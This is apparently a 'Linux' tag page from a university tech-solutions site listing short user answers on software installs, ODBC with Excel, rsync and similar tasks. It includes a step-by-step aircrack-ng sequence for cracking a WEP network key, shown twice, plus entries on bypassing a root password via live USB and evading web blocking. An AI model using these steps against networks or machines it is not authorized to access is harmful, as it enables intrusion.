Linux

Use aircrack-ng

--This solution had been mistakenly posted to the 'Manage News Sources' challenge (https://techscreen.tuwien.ac.at/node/1365)--

Run the software aircrack-ng under Linux and enter the following commands in the shell:

  • sudo airmon-ng start wlan0 - to start the wlan in promiscuous mode
  • sudo airmon-ng wlan0 - to see all interfaces (mon0, which is monitoring the traffic, appears)
  • sudo airodump-ng wlan0 - to see all traffic, you can find the bssid of the desired network
  • sudo airodump-ng -c 8 --bssid [found bssid] -w output mon0 - capture all traffic with the chosen network and write it inside 'output'
  • sudo aireplay-ng -3 -b [found bssid] mon0 - to send ARP packages to it
  • sudo aireplay-ng --fakeauth 0 -a [found bssid] mon0 - to make fake authentication (to send packages to the wanted network so its key can be cracked afterwards)
  • sudo aireplay-ng --deauth 0 -a [found bssid] mon0 - to make fake deauthentication
  • sudo aircrack-ng output-01.cap - to crack the key (using ~52000 IVs)

Now you should be able to read the network key out of the file.

Taggings:

Install Gyachi

Precondition:

  • Having a Linux station
    • In this case I will describe the installation only under Ubuntu version
    • Being able to install stuff, having the necessary rights on the system.
  • Needing a Yahoo messenger with more than only chatting functionality

Steps:

  1. Open up a terminal
  2. Type in “sudo add-apt-repository ppa:user/ppa-name”
  3. Replace “user” by your username
  4. Afterwards type in your password
  5. Update the repository by typi ng : “sudo apt-get update”
  6. Type in the normal install commands your used to under Ubuntu :
  7. “sudo apt-get install gyachi”
  8. Password again ;)
  9. Use your newly installed Gyachi and enjoy functionality ;)
  10. If you cant find it under your programs in the GUI just type gyachi again in a console ;)

Useful sites:
http://www.technixupdate.com/download-yahoo-messenger-for-ubuntu-linux-w...
http://in.docs.yahoo.com/messenger/download/unix.html
http://gyachi.sourceforge.net/

Taggings:

Adding a ODBC connection to MySQL and use it within Microsoft Excel

Microsoft Excel offers to connect to all common database management systems (DMBS) trough the ODBC interface. Excel has a built connector for Microsoft Access and Microsoft SQL. Since we are using MySQL we need acces the DBMS go trough ODBC.

An ODBC connection brings two components into play:

  1. ODBC driver manager

    The ODBC driver manager handels all the installed ODBC connectors. Microsoft Excel uses the ODBC driver manager which interfaces the ODBC connector to Microsoft Excel. Windows offers an integrated driver manager. To open it click the Start button -> Control panel -> Administrative tools -> Datasources (ODBC).
    ATTENTION: Since Mac OS X (10.6) there is no built in ODBC driver manager availble. Therefore it has to be manually installed under Mac OS X greater or equal than version 10.6. A recommendation is to use iODBC, an open ODBC driver manager. It is available for Linux as well. Download it at: http://www.iodbc.org/dataspace/iodbc/wiki/iODBC/Downloads and install it

  2. ODBC database connector/driver

    This connector is needed for each particular database management system (DMBS) as its implementd DMBS specific that means there is no common connector for all DBMS available. In our case as we want to use MySQL we need the MySQL ODBC driver either for Windows or Mac OS X. Download the connector at: http://www.mysql.com/downloads/connector/odbc/
    ATTENTION: Check for which if your Excel is a 32 bit version or a 64 bit version. Even you are using a 64 bit version of Windows, if you have a 32 bit version of Excel running on it you need the 32 bit version!

Once the driver is installed, it can be configured trough the driver manager. Open either iODBC (in case of Mac OS X) or the built in driver manager of Windows (Start button -> Control panel -> Administrative tools -> Datasources (ODBC)) and you are able to add a new user data source (a so called DSN). For this DSN you must provide all relevant information (e.g server address and port, username, password, database name). A easy to understand wizard will guide you trough this process. This works quite similar under Mac or Windows.

Once the DSN is configured properly it is possible to use this database within Excel.
Open a new spreadsheet and klick on Data -> Other sources -> From Microsoft Query (see an attached screenshot of a German Excel version). Then you can select the previously configured DSN of your datasource. Select them and Microsoft SQL appears (see attached screenshot). You can enter your query here and execute it. Once the query is valid, Excel offers you different choices what to do with the retrieved data (please see an attached screenshot). You can simply add the result set to a table or transform it into a pivot table.

Use aircrack-ng

--This solution has been moved to the 'Crack WEP' challenge as it had been mistakenly set as solution for managing news sources (https://techscreen.tuwien.ac.at/node/1437).--

Run the software aircrack-ng under Linux and enter the following commands in the shell:

  • sudo airmon-ng start wlan0 - to start the wlan in promiscuous mode
  • sudo airmon-ng wlan0 - to see all interfaces (mon0, which is monitoring the traffic, appears)
  • sudo airodump-ng wlan0 - to see all traffic, you can find the bssid of the desired network
  • sudo airodump-ng -c 8 --bssid [found bssid] -w output mon0 - capture all traffic with the chosen network and write it inside 'output'
  • sudo aireplay-ng -3 -b [found bssid] mon0 - to send ARP packages to it
  • sudo aireplay-ng --fakeauth 0 -a [found bssid] mon0 - to make fake authentication (to send packages to the wanted network so its key can be cracked afterwards)
  • sudo aireplay-ng --deauth 0 -a [found bssid] mon0 - to make fake deauthentication
  • sudo aircrack-ng output-01.cap - to crack the key (using ~52000 IVs)

Now you should be able to read the network key out of the file.

Taggings:

Installing Linux to compile and run such programs

One solution was to download a linux distribution, install it besides Win7 and then use the commands as recommended in the shell of this linux distribution.
That solution worked like a charm, the only "drawback" of that solution were the 6gb additional storage needed for installing the linux distribution.

Taggings:

Use Samba or OpenSSH

If you want to host (or have access to) network folders that can be accessed with Windows in Linux systems you can use Samba[1]. You just have to install and configure it which can be very tricky.
On the other hand if you want to have access between Linux computers you can use OpenSSH which is already included in most of the Linux distributions.

[1] http://en.wikipedia.org/wiki/Samba_%28software%29
[2] http://www.openssh.com/

use available tools provided by your Platform(Linux)

Linux provides a nice tool called ImageMagick. This tool makes converting images to pdfs very easy.
> convert rofl.jpg rofl.pdf
It can also convert recursively, eg: whole directory trees.

> convert *jpg foo.jpg

Taggings:

Use Tor or ssh tunnel

Two more or less reliable methods come to mind. Tor and a dynamic ssh tunnel.
-> Tor: Tor is a free software which is pretty easy to install and that can be used to work around the usual web-blocking
techniques. Unfortunately, tor is not very fast, which deteriorates the web-experience.

SSh tunnel:
A small root server costs about 20€/ month. Which can be utilized as a dynamic ssh tunnel, to circumvent most of the web-blocking techniques.
This can be both used on windows/linux etc.
-> Windows: Putty
-> Linux: ssh

Taggings:

Boot stick

To solve the problem at hand:
*) Get a USB pen drive.
*) Install a minimal Linux system on using a tool like Unetbooin or use a Live-image provided by a Linux distribution.
*) Set the bios on the laptop to boot from the pen drive.
*) After booting the live system on the laptop there are to possibilities:
a) Editing the file /etc/passwd on the installed operating system to disable the password check for the root account.
b) Using chroot to switch into the environment of the installed operating system. Run passwd to set a new password you can remember.

To prevent problems like this in the future:
*) Don't use 20 character passwords that are completely random.
There are password generators that produce pronounceable passwords, those are much easier to remember.
*) Allow your account to use sudo.

Taggings:

Synchronizing folders in Linux by using rsync

Linux has a nifty little tool called rsync that should be available on the distribution of your choice (provided it was updated at least once since the stone age). From the man pages:

Rsync is a fast and extraordinarily versatile file copying tool. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon. It offers a large number of options that control every aspect of its behavior and permit very flexible specification of the set of files to be copied. It is famous for its delta-transfer algorithm, which reduces the amount of data sent over the network by sending only the differences between the source files and the existing files in the destination. Rsync is widely used for backups and mirroring and as an improved copy command for everyday use.

So rsync is perfect for the job of keeping folders on different machines up to date. The proposed solution uses a central server approach looks as follows:

  • Rsync is running in daemon mode on the server. For authentication a file with user:password pairs is used. Information on how to set up an rsync daemon can be found in the related man pages.
  • On the client machines rsync is executed by a small script. Authentication again happens through a file stating username and password that is passed to rsync via the --password-file parameter. This allows for automation which is achieved by execution through a cron job as well as during boot and shutdown. How to achieve this is dependant on the distribution in use. On e.g. Arch Linux rc.local and /etc/rc.local.shutdown would be good places for executing the script on boot and shutdown respectively. Information on how to set up a cron job may be found in the man pages for crontab

Caveats:

  • The user credentials for authentication are stored in a plain text file. While this is necessary for automated execution it may be a no-go for some people. The alternatives are not using a password at all or using ssh as connection protocol. Both have options have their own pitfalls.
  • The setup (i.e. the exact calls and paths) on the client side will vary from distribution to distribution and will most likely need tweaking on each new machine; no solution that works out of the box.

Taggings:

Pages

Subscribe to Linux